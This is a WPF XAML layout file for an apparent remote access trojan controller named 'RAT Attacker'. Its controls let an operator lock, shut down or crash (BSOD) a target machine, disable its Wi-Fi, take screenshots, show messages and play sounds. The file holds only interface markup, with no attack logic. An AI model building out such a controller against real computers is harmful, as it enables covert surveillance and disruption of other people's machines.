RAT Attacker/MainWindow.xaml

<Window x:Class="RAT_Attacker.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        mc:Ignorable="d"
        Title="RAT Attacker"
        Width="800"
        Height="450"
        Background="Black">
    <Window.Resources>
        <Style TargetType="TextBox">
            <Setter Property="Background" Value="Black" />
            <Setter Property="Foreground" Value="White" />
        </Style>
        <Style TargetType="MenuItem">
            <Setter Property="Background" Value="Black" />
        </Style>
        <Style TargetType="Button">
            <Setter Property="Background" Value="Black" />
            <Setter Property="Foreground" Value="White" />
            <Setter Property="Template">
                <Setter.Value>
                    <ControlTemplate TargetType="Button">
                        <Border Background="{TemplateBinding Background}" BorderThickness="1" BorderBrush="DarkGray">
                            <ContentPresenter HorizontalAlignment="Center" VerticalAlignment="Center" />
                        </Border>
                    </ControlTemplate>
                </Setter.Value>
            </Setter>
            <Style.Triggers>
                <Trigger Property="IsMouseOver" Value="True">
                    <Setter Property="Background" Value="Gray" />
                </Trigger>
            </Style.Triggers>
        </Style>
    </Window.Resources>
    <Grid>
        <Grid.RowDefinitions>
            <RowDefinition Height="Auto" />
            <RowDefinition Height="Auto" />
            <RowDefinition />
            <RowDefinition Height="Auto" />
        </Grid.RowDefinitions>
        <Menu Background="Black" Foreground="White">
            <Menu.Resources>
                <Style TargetType="Image">
                    <Setter Property="Height" Value="16" />
                </Style>
            </Menu.Resources>
            <MenuItem Click="CloseActiveWindow">
                <MenuItem.Header>
                    <TextBlock Text="Close Active Window"
                               VerticalAlignment="Center" />
                </MenuItem.Header>
                <MenuItem.Icon>
                    <Image Source="/Icons/shell32_240.ico" />
                </MenuItem.Icon>
            </MenuItem>
            <MenuItem Click="ShowMessageBox">
                <MenuItem.Header>
                    <TextBlock Text="Show Message Box"
                               VerticalAlignment="Center" />
                </MenuItem.Header>
                <MenuItem.Icon>
                    <Image Source="/Icons/shell32_161.ico" />
                </MenuItem.Icon>
            </MenuItem>
            <MenuItem Click="Lock">
                <MenuItem.Header>
                    <TextBlock Text="Lock"
                               VerticalAlignment="Center" />
                </MenuItem.Header>
                <MenuItem.Icon>
                    <Image Source="/Icons/shell32_45.ico" />
                </MenuItem.Icon>
            </MenuItem>
            <MenuItem Click="Shutdown">
                <MenuItem.Header>
                    <TextBlock Text="Shutdown"
                               VerticalAlignment="Center" />
                </MenuItem.Header>
                <MenuItem.Icon>
                    <Image Source="/Icons/shell32_28.ico" />
                </MenuItem.Icon>
            </MenuItem>
            <MenuItem>
                <MenuItem.Header>
                    <StackPanel Orientation="Horizontal">
                        <Image Source="/Icons/SndVol_101.ico" />
                        <TextBlock Text="Sound..." VerticalAlignment="Center" Margin="4,0,0,0"/>
                    </StackPanel>
                </MenuItem.Header>
                <MenuItem Click="Mute">
                    <MenuItem.Header>
                        <TextBlock Text="Mute"
                               VerticalAlignment="Center" />
                    </MenuItem.Header>
                    <MenuItem.Icon>
                        <Image Source="/Icons/SndVol_111.ico" />
                    </MenuItem.Icon>
                </MenuItem>
                <MenuItem Click="Max">
                    <MenuItem.Header>
                        <TextBlock Text="Max"
                               VerticalAlignment="Center" />
                    </MenuItem.Header>
                    <MenuItem.Icon>
                        <Image Source="/Icons/SndVol_110.ico" />
                    </MenuItem.Icon>
                </MenuItem>
            </MenuItem>
            <MenuItem Click="DisableWiFi">
                <MenuItem.Header>
                    <TextBlock Text="Disable Wi-Fi"
                               VerticalAlignment="Center" />
                </MenuItem.Header>
                <MenuItem.Icon>
                    <Image Source="/Icons/WlanMM_3131.ico" />
                </MenuItem.Icon>
            </MenuItem>
            <MenuItem>
                <MenuItem.Header>
                    <StackPanel Orientation="Horizontal">
                        <Image Source="/Icons/shell32_35.ico" />
                        <TextBlock Text="Screen..." VerticalAlignment="Center" Margin="4,0,0,0" />
                    </StackPanel>
                </MenuItem.Header>
                <MenuItem Click="TakeScreenshot">
                    <MenuItem.Header>
                        <TextBlock Text="Take Screenshot"
                                   VerticalAlignment="Center" />
                    </MenuItem.Header>
                    <MenuItem.Icon>
                        <Image Source="/Icons/shell32_63008.ico" />
                    </MenuItem.Icon>
                </MenuItem>
                <MenuItem Click="Lag">
                    <MenuItem.Header>
                        <TextBlock Text="Lag"
                               VerticalAlignment="Center" />
                    </MenuItem.Header>
                    <MenuItem.Icon>
                        <Image Source="/Icons/DpiScaling_100.ico" />
                    </MenuItem.Icon>
                </MenuItem>
                <MenuItem Click="Blink">
                    <MenuItem.Header>
                        <TextBlock Text="Blink"
                               VerticalAlignment="Center" />
                    </MenuItem.Header>
                    <MenuItem.Icon>
                        <Image Source="/Icons/shell32_284.ico" />
                    </MenuItem.Icon>
                </MenuItem>
            </MenuItem>
        </Menu>
        <Border Grid.Row="1"
                Padding="4">
            <WrapPanel>
                <WrapPanel.Resources>
                    <Style TargetType="TextBlock">
                        <Setter Property="Foreground" Value="White" />
                    </Style>
                    <Style TargetType="GroupBox">
                        <Setter Property="Margin" Value="0,0,4,0" />
                    </Style>
                </WrapPanel.Resources>
                <GroupBox HorizontalAlignment="Left">
                    <GroupBox.Header>
                        <StackPanel Orientation="Horizontal">
                            <Image Source="/Icons/explorer_254.ico"
                                   Height="16" />
                            <TextBlock Text="Send Message" />
                        </StackPanel>
                    </GroupBox.Header>
                    <StackPanel Orientation="Horizontal">
                        <TextBox Name="MessageTextBox"
                                 Width="100"
                                 KeyDown="MessageTextBox_KeyDown" />
                        <Button Content="Send"
                                Click="SendMessage" />
                    </StackPanel>
                </GroupBox>
                <GroupBox HorizontalAlignment="Left">
                    <GroupBox.Header>
                        <StackPanel Orientation="Horizontal">
                            <Image Source="/Icons/wmploc_601.ico"
                                   Height="16" />
                            <TextBlock Text="Play Sound (wav)" />
                        </StackPanel>
                    </GroupBox.Header>
                    <StackPanel Orientation="Horizontal">
                        <TextBox Name="AudioFileTextBox"
                                 Width="300"
                                 KeyDown="MessageTextBox_KeyDown" />
                        <Button Content="Play" Click="PlaySound" />
                    </StackPanel>
                </GroupBox>
                <Border BorderThickness="1" BorderBrush="White">
                    <StackPanel Orientation="Horizontal">
                        <CheckBox Name="BsodCheckBox" Content="BSOD" Foreground="White"
                                  VerticalAlignment="Center" Margin="4,0" />
                        <Button Click="Bsod" IsEnabled="{Binding ElementName=BsodCheckBox, Path=IsChecked}" Margin="1">
                            <Button.Content>
                                <StackPanel Orientation="Vertical">
                                    <Image Source="/Icons/pifmgr_39.ico" Width="19" />
                                    <TextBlock Text="BSOD" />
                                </StackPanel>
                            </Button.Content>
                        </Button>
                    </StackPanel>
                </Border>
            </WrapPanel>
        </Border>
        <Image Name="ScreenshotImage"
               Grid.Row="2" />
        <StatusBar Grid.Row="3" Background="Black" Foreground="White">
            <TextBlock Text="IP Address: " />
            <TextBox Name="AddressTextBox"
                     Text="127.0.0.1"
                     Width="110"
                     FontFamily="Consolas" />
        </StatusBar>
    </Grid>
</Window>